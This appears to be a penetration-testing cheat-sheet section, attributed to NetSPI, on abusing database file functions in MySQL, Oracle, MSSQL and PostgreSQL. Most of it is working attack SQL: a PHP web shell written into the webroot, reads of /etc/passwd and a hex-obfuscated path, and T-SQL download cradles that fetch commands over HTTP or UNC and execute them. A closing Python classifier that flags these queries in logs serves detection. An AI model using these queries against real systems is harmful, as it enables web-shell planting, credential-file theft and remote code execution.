Reading and Writing Files

Reading and writing files aids data gathering as well as data exfiltration. Many methods involve writing to the webroot, which enables a web shell to be executed or allows data to be exfiltrated over port 80/443.

* Requires privileged user

Dump to file:
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'

Dump PHP Shell:
SELECT 'system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'

Read File:
SELECT LOAD_FILE('/etc/passwd')

Read File Obfuscated (reads c:\boot.ini):
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)

File Privileges:
SELECT file_priv FROM mysql.user WHERE user = 'netspi'
SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%netspi%'

Reading and Writing Files

UTL_FILE can sometimes be used. Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';

Java can be used to read and write files if it's installed (it is not available in Oracle Express).

Reading and Writing Files

* Requires privileged user

Download Cradle bulk in server - TSQL:

-- Bulk Insert - Download Cradle Example

-- Setup variables
Declare @cmd varchar(8000)

-- Create temp table
CREATE TABLE #file (content nvarchar(4000));

-- Read file into temp table - web server must support propfind
BULK INSERT #file FROM '\\sharepoint.acme.com@SSL\Path\to\file.txt';

-- Select contents of file
SELECT @cmd = content FROM #file

-- Display command
SELECT @cmd

-- Run command
EXECUTE(@cmd)

-- Drop the temp table
DROP TABLE #file

Download Cradle OAP 1 - TSQL:

-- OLE Automation Procedure - Download Cradle Example
-- Does not require a table, but can't handle larger payloads

-- Note: This also works with unc paths \\ip\file.txt
-- Note: This also works with WebDAV paths (\\ip@80\file.txt); however, the target web server needs to support PROPFIND.

-- Setup Variables
DECLARE @url varchar(300)
DECLARE @WinHTTP int
DECLARE @handle int
DECLARE @Command varchar(8000)

-- Set target URL containing TSQL
SET @url = 'http://127.0.0.1/mycmd.txt'

-- Setup namespace
EXEC @handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT

-- Call the Open method to setup the HTTP request
EXEC @handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'

-- Call the Send method to send the HTTP GET request
EXEC @handle=sp_OAMethod @WinHTTP,'Send'

-- Capture the HTTP response content
EXEC @handle=sp_OAGetProperty @WinHTTP,'ResponseText', @Command out

-- Destroy the object
EXEC @handle=sp_OADestroy @WinHTTP

-- Display command
SELECT @Command

-- Run command
EXECUTE (@Command)

Download Cradle OAP 2 - TSQL:

-- OLE Automation Procedure - Download Cradle Example - Option 2
-- Can handle larger payloads, but requires a table

-- Note: This also works with unc paths \\ip\file.txt
-- Note: This also works with WebDAV paths (\\ip@80\file.txt); however, the target web server needs to support PROPFIND.

-- Setup Variables
DECLARE @url varchar(300)
DECLARE @WinHTTP int
DECLARE @Handle int
DECLARE @Command varchar(8000)

-- Set target URL containing TSQL
SET @url = 'http://127.0.0.1/mycmd.txt'

-- Create temp table to store downloaded string
CREATE TABLE #text(html text NULL)

-- Setup namespace
EXEC @Handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT

-- Call open method to configure HTTP request
EXEC @Handle=sp_OAMethod @WinHTTP, 'Open',NULL,'GET',@url,'false'

-- Call Send method to send the HTTP request
EXEC @Handle=sp_OAMethod @WinHTTP,'Send'

-- Capture the HTTP response content
INSERT #text(html)
EXEC @Handle=sp_OAGetProperty @WinHTTP,'ResponseText'

-- Destroy the object
EXEC @Handle=sp_OADestroy @WinHTTP

-- Display the command
SELECT @Command = html from #text
SELECT @Command

-- Run the command
EXECUTE (@Command)

-- Remove temp table
DROP TABLE #text

Reading Files - TSQL:
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceTxt.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_BulkInsert.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceXlsx
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetBulk.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetTxt.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetXlsx.sql

Writing Files - TSQL:
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_bulkinsert.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_OpenRowSetTxt.sql

Reading and Writing Files

* Requires privileged user

Read Files from Operating System - COPY:
CREATE TABLE mydata(t text);
COPY mydata FROM '/etc/passwd';
SELECT * FROM mydata;
DROP TABLE mydata;

Read Files from Operating System - pg_read_file:
SELECT pg_read_file('/usr/local/pgsql/data/pg_hba.conf', 0, 200);

Writing Files from Operating System:
CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES ('');
COPY mytable (mycol) TO '/var/www/test.php';
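
Detection-side view of the queries in the sections above, as an added example that is not part of the original NetSPI page: a Python classifier that flags the file read/write primitives listed here when they appear in logged SQL statements, and decodes hex literals such as the obfuscated LOAD_FILE argument so the hidden path is visible during triage. The rule labels, function names and sample log are constructed for illustration.

```python
import re

# Rules for the file read/write primitives listed on this page.
# Labels are names chosen for this example, not vendor terminology.
RULES = [(label, re.compile(rx, re.I | re.S)) for label, rx in [
    ("mysql-file-write", r"\bINTO\s+(?:OUTFILE|DUMPFILE)\b"),
    ("mysql-file-read", r"\bLOAD_FILE\s*\("),
    ("oracle-utl-file", r"\bUTL_FILE\b"),
    ("mssql-bulk-insert-unc", r"\bBULK\s+INSERT\b[^;]*?\bFROM\s+N?'\\\\"),
    ("mssql-ole-automation", r"\bsp_OA(?:Create|Method|GetProperty|Destroy)\b"),
    # A quoted source/target means a server-side file; COPY ... FROM STDIN is not flagged.
    ("pgsql-copy-file", r"\bCOPY\b[^;]*?\b(?:FROM|TO)\s+E?'"),
    ("pgsql-read-file", r"\bpg_read_file\s*\("),
]]
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)


def decode_hex_literals(statement):
    """Return printable decodings of 0x... literals (e.g. a hidden file path)."""
    decoded = []
    for match in HEX_LITERAL.finditer(statement):
        text = bytes.fromhex(match.group(1)).decode("latin-1")
        if text.isprintable():
            decoded.append(text)
    return decoded


def classify(statement):
    """Return (sorted rule labels, decoded hex strings) for one logged statement."""
    labels = sorted(label for label, rx in RULES if rx.search(statement))
    return labels, (decode_hex_literals(statement) if labels else [])


# Constructed sample log; statements 2-5 reuse queries shown on this page.
SAMPLE_LOG = [
    "SELECT id, name FROM customers WHERE id = 42",
    "SELECT LOAD_FILE(0x633A5C626F6F742E696E69)",
    r"BULK INSERT #file FROM '\\sharepoint.acme.com@SSL\Path\to\file.txt';",
    "EXEC @handle=sp_OACreate 'WinHttp.WinHttpRequest.5.1',@WinHTTP OUT",
    "COPY mydata FROM '/etc/passwd';",
    "COPY mydata FROM STDIN",
]


def scan(statements):
    """Return (line number, labels, decoded hex) for every flagged statement."""
    results = [(n, *classify(s)) for n, s in enumerate(statements, 1)]
    return [r for r in results if r[1]]
```

Pattern matching on statement text is a triage aid; restricting the file privileges each section checks for remains the primary control.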

© 2023 Copyright by NetSPI. All rights reserved.